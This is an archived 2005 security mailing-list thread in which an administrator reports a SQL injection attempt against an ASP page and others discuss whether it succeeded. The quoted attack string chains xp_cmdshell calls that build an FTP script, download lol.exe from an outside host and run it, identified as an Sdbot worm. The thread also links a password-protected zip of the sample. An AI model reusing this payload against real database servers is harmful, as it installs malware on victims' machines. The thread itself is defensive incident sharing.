Security Incidents mailing list archives

Re: SQL injection ... another attack

From: "Maxime Ducharme" <mducharme () cybergeneration com>
Date: Thu, 20 Jan 2005 15:49:39 -0500


I must first thank everybody who replied,
I received alot of useful information.

This attack have been detected by our home-made
webapp security monitoring tool

How can you tell this worked ? I can ensure
it didnt.

Our firewalls also restrict outbound access,
so IRC communication couldnt work. Our servers
simply does not have Internet access, they
can only reply to opened TCP connection on
port 80.

Database Server is back-end, private IP on separate
VLAN without gateway set in IP config.

Ciao

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

----- Original Message ----- 
From: "Harlan Carvey" <keydet89 () yahoo com>
To: "gaurav kumar" <gkverma () gmail com>; "Maxime Ducharme"
<mducharme () cybergeneration com>
Cc: <incidents () securityfocus com>
Sent: Thursday, January 20, 2005 1:57 PM
Subject: Re: SQL injection ... another attack

I think the real issue here is that the SQL Injection
worked....


--- gaurav kumar <gkverma () gmail com> wrote:

my VirusScan (network associates) detected it as
W32/Sdbot.worm.gen


On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
<mducharme () cybergeneration com> wrote:


Hi to the list

today we received the same SQL injection attack
on the same URL :

IP : 24.1.139.29
(c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :
377';exec MASTER..xp_cmdshell 'mkdir

%systemroot%\system32\Macromed\lolx\';

exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadicka

r0ckpaul >>

%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe

%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v

-s:%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell 'del

%systemroot%\system32\Macromed\lolx\blah.jkd';

exec MASTER..xp_cmdshell

'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--


The lol.exe file can be found in this archive for

inspection :

http://www.cybergeneration.com/security/2005.01.19/lol.zip

zip pass is das978tewa234

Norton with definitions of 12 jan. doesnt find

anything

suspicious.

I'm interested if someone do an analysis on this

file.


Have a nice day

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

----- Original Message -----
From: "Maxime Ducharme"

<mducharme () cybergeneration com>

To: <full-disclosure () lists netsys com>; "General

DShield Discussion List"

<list () lists dshield org>;

<incidents () securityfocus com>

Sent: Wednesday, January 05, 2005 12:22 PM
Subject: SQL injection worm ?

<snipped>

Current thread:

SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Teodor Cimpoesu (Jan 20)
- Re: SQL injection ... another attack gaurav kumar (Jan 20)
  - Re: SQL injection ... another attack Harlan Carvey (Jan 20)
    - Re: SQL injection ... another attack Maxime Ducharme (Jan 20)